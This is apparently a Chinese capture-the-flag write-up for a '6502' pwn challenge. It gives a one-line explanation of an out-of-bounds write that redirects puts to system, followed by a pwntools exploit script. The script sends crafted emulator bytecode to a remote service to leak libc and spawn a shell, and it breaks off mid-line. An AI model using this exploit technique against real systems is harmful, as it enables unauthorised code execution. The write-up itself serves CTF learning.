01PWN1.6502越界读写,把 puts 改 system然后最好输入一下 /bin/sh 就可以了:from pwn import *context.log_level="debug"#p=process("./6502_proccessor")p=remote("172.10.0.7",10002)#gdb.attach(p,"b *$rebase(0x59FA)\nb *$rebase(0x5958)")#pause()payload=b""payload+=b"\xad\x42\xdf"#get libcpayload+=b"\x69\xb0"#add 0x92payload+=b"\x8d\xf2\xde"#write ac to nop_codepayload+=b"\xad\x43\xdf"#get libcpayload+=b"\x69\xed"#add 0xecpayload+=b"\x8d\xf3\xde"#write ac to nop_codepayload+=b"\xad\x44\xdf"#get libcpayload+=b"\x69\x01"#add 0xecpayload+=b"\x8d\xf4\xde"#write ac to nop_codepayload+=b"\xad\x45\xdf"#get libcpayload+=b"\x8d\xf5\xde"#write ac to nop_codepayload+=b"\xad\x46\xdf"#get libcpayload+=b"\x8d\xf6\xde"#write ac to nop_codepayload+=b"\xad\x47\xdf"#get libcpayload+=b"\x8d\xf7\xde"#write ac to nop_codepayload+=b"\xad\x44\xdf"#get libcpayload+=b"\x69\x01"#add 0xecpayload+=b"\x8d\xf4\xde"#write ac to nop_codepayload+=b"\xfc"#nopp.recvuntil("length:")p.sendline(str(len(payload))
………………………………